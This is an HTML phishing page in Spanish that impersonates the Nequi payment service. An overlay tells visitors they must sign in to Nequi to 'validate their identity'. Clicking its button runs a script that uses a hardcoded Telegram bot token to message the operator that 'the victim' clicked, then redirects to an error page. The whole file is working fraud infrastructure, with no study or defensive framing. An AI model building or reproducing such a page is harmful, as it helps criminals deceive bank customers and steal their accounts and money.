<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ejemplo de Página</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background: url('dale.png') no-repeat center center fixed; /* Reemplaza con la URL de tu imagen */
            background-size: cover;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            position: relative;
        }
        .container {
            background-color: #fff;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
        }
        .alert-overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 1;
        }
        .alert {
            background-color: #fff;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.5);
            text-align: center;
            z-index: 2;
            max-width: 400px;
        }
        .alert img {
            max-width: 100%;
            height: auto;
            border-radius: 5px;
            margin-bottom: 20px;
        }
        .alert h2 {
            margin-bottom: 20px;
            font-size: 24px;
            color: #000;
            font-weight: bold;
        }
        .alert p {
            font-size: 18px;
            margin-bottom: 20px;
            color: #666;
        }
        .alert button {
            width: 200px;
            background-color: #da0081;
            color: #fff;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s ease;
            font-size: 16px;
        }
        .alert button:hover {
            background-color: #a0006f;
        }
    </style>
</head>
<body>
    <header id="main-header">
        <a class="logo-header" href="index.html">
            <img id="logo-header" src="https://i.imgur.com/vOLtQz8.png">
        </a>
    </header>
    <div class="alert-overlay" id="alertOverlay">
        <div class="alert">
            <img src="alert.png" width="70px" alt="Imagen de alerta">
            <h2>Queremos validar que eres tú</h2>
            <p>Por tu seguridad, necesitamos que ingreses a tu Nequi para validar tu identidad.</p>
            <button onclick="notificarYRedirigir()">Listo</button>
        </div>
    </div>
    <div class="container">
        <p>Hola, ¿cómo estás?</p>
    </div>

    <script>
        function notificarYRedirigir() {
            // Aquí envías la notificación a Telegram
            const telegramBotToken = '6917299241:AAFOrxs10OP5RlPCn5VyOc1huWhY3ZTLiH0';
            const chatId = '5915051785';
            const message = 'La victima dio clic a el boton de Listo';

            const url = `https://api.telegram.org/bot${telegramBotToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

            fetch(url)
                .then(response => response.json())
                .then(data => {
                    window.location.href = "error.html"; 
                })
                .catch(error => console.error('Error:', error));
        }
    </script>
</body>
</html>
